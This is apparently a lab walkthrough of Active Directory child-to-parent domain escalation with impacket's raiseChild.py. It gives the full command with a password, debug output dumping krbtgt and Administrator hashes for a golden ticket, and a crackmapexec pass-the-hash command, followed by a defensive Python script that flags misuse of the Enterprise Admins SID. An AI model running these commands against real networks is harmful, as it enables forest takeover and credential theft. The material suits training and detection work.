# RaiseMeUp - Escalate with impacket raiseChild

* OK, now imagine you have pwned the domain north.newyork.local: you have dumped the NTDS and you have the NT hashes of all the north domain users.

> As Microsoft says, a domain trust is not a security boundary.

<figure><img src="/files/BbNPCkBPH0oV3ZAuAyfe" alt=""><figcaption></figcaption></figure>

### RaiseMeUp - Escalate with impacket raiseChild

* To escalate from child to parent, the simplest way is impacket's raiseChild.py script, which does all the work for us.

```
raiseChild.py north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1!
```

<figure><img src="/files/6gLiBo0YzT0KI0WUga41" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/VfjWS22qQ3Slakv1b6BO" alt=""><figcaption></figcaption></figure>

```
$raiseChild.py north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1! -debug -ts
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[2023-03-07 12:38:36] [+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket-0.10.1.dev1+20230216.13520.d4c06e7f-py3.9.egg/impacket
[2023-03-07 12:38:36] [+] Calling NRPC DsrGetDcNameEx()
[2023-03-07 12:38:36] [*] Raising child domain north.newyork.local
[2023-03-07 12:38:36] [*] Forest FQDN is: newyork.local
[2023-03-07 12:38:36] [*] Raising north.newyork.local to newyork.local
[2023-03-07 12:38:36] [+] Calling LSAT hLsarQueryInformationPolicy2()
[2023-03-07 12:38:36] [*] newyork.local Enterprise Admin SID is: S-1-5-21-620482180-1620433373-1814187987-519
[2023-03-07 12:38:36] [*] Getting credentials for north.newyork.local
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=north,DC=newyork,DC=local
north.newyork.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b215421b300eb02228f7b4e8f8414201:::
north.newyork.local/krbtgt:aes256-cts-hmac-sha1-96s:b85d7acc1aba6e1edb419d7b6735eeeb4014eb43731e9b4df9f525cb0d036f2e
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] VALIDATION_INFO before making it gold
[2023-03-07 12:38:36] [+] Getting TGS for SPN cifs/NYC
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [*] Getting credentials for newyork.local
[2023-03-07 12:38:36] [+] 192.168.56.10 is NYC.newyork.local
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=newyork,DC=local
newyork.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bd3def911c72eaa484fc6a302f3a08b:::
newyork.local/krbtgt:aes256-cts-hmac-sha1-96s:4860355d58ab70fb7446b46de1e21a430ff34234bda82c2498976f59cb5a7b48
[2023-03-07 12:38:36] [*] Target User account name is Administrator
[2023-03-07 12:38:36] [+] 192.168.56.10 is NYC.newyork.local
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=Administrator,CN=Users,DC=newyork,DC=local
newyork.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
newyork.local/Administrator:aes256-cts-hmac-sha1-96s:bdb1a615bc9d82d2ab21f09f11baaef4bc66c48efdd56424e1206e581e4dd827
```

* This creates a golden ticket for the forest Enterprise Admin.
* It then logs into the forest and gets the target info (default Administrator, RID 500).
* The whole job is done with one command; if you are lazy you don't even need to understand x)

Authenticate to verify that the dumped hash is good:

```
crackmapexec smb 192.168.56.10 -u Administrator -H ":c66d72021a2d4744409969a581a1705e" -d newyork.local
```

<figure><img src="/files/m9XPDBlDS5UFU553cCIx" alt=""><figcaption></figcaption></figure>

smbexec.py whoami????

<figure><img src="/files/9Na1azPygujzljLRdLE0" alt=""><figcaption></figcaption></figure>
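A defender's view of the escalation above, as an added example that is not part of the original page or of impacket: it scans logon records for accounts outside the forest root that carry the root's Enterprise Admins SID (the `-519` SID printed in the raiseChild output). The record layout, `CHILD_SID`, the `svc.backup` and `ea.delegate` accounts and the function name are assumptions constructed for illustration.

```python
import re

# RIDs of groups that exist only in the forest root domain. 519 is the
# Enterprise Admins RID seen in the raiseChild output; 518 is Schema Admins.
FOREST_ROOT_RIDS = {518: "Schema Admins", 519: "Enterprise Admins"}
DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

# Forest root values as printed on this page.
ROOT_DOMAIN = "newyork.local"
ROOT_SID = "S-1-5-21-620482180-1620433373-1814187987"
# Constructed placeholder: the child domain SID is not shown on the page.
CHILD_SID = "S-1-5-21-1111111111-2222222222-3333333333"

# Constructed sample records (not real logs): account, domain, group SIDs.
SAMPLE_LOGONS = [
    {"account": "fernando.alonzo", "domain": "north.newyork.local",
     "group_sids": [CHILD_SID + "-513", ROOT_SID + "-519"]},
    {"account": "Administrator", "domain": "newyork.local",
     "group_sids": [ROOT_SID + "-512", ROOT_SID + "-519"]},
    {"account": "svc.backup", "domain": "north.newyork.local",
     "group_sids": [CHILD_SID + "-513", "S-1-5-32-545"]},
    {"account": "ea.delegate", "domain": "north.newyork.local",
     "group_sids": [CHILD_SID + "-513", ROOT_SID + "-519"]},
]

def flag_root_sids(logons, root_domain, root_sid, expected=frozenset()):
    """Return alerts for non-root accounts holding forest-root group SIDs."""
    alerts = []
    for rec in logons:
        who = (rec["domain"].lower(), rec["account"].lower())
        # Root-domain accounts are out of scope. These are universal groups,
        # so legitimate members from other domains must be allow-listed.
        if who[0] == root_domain.lower() or who in expected:
            continue
        for sid in rec["group_sids"]:
            m = DOMAIN_SID_RE.match(sid)
            if not m:
                continue  # builtin or malformed SID, no domain part
            rid = int(m.group(2))
            if m.group(1) == root_sid and rid in FOREST_ROOT_RIDS:
                alerts.append((rec["domain"], rec["account"],
                               FOREST_ROOT_RIDS[rid]))
    return alerts

if __name__ == "__main__":
    known = {("north.newyork.local", "ea.delegate")}
    for alert in flag_root_sids(SAMPLE_LOGONS, ROOT_DOMAIN, ROOT_SID, known):
        print("REVIEW:", *alert)
```
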

